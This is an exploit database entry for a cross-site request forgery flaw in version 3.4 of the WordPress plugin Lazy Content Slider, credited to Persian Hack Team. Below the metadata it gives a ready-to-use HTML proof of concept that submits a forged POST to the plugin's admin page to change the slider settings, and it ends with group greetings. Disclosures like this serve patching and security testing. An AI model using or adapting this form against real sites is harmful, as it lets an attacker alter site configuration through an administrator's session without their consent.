WordPress Plugin Lazy Content Slider 3.4 - Cross-Site Request Forgery (Add Catetory)

Author: Persian Hack Team
type: webapps
platform: php
port: 80.0
date_added: 2016-07-08 
date_updated: 2016-07-08 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comlazy-content-slider.3.4.zip

######################
# Exploit Title : WordPress Lazy content Slider Plugin - CSRF Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://wordpress.org/support/view/plugin-reviews/lazy-content-slider
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 3.4
# Date: 2016/07/08
######################
#
# PoC:
# The vulnerable page is
# /wp-content/plugins/lazy-content-slider/lzcs_admin.php
# The Code for CSRF.html is

<html>
<form action="http://localhost/wp/wp-admin/admin.php?page=lazy-content-slider%2Flzcs.php" method="POST">
<input name="lzcs" type="text" value="lzcs">
<input name="lzcs_color" type="text" value="dark">
<input type="text" name="lzcs_count" value="5">
<input type="submit" value="go!!">
</form>
</html>

#
######################
# Discovered by :  Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi &  Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################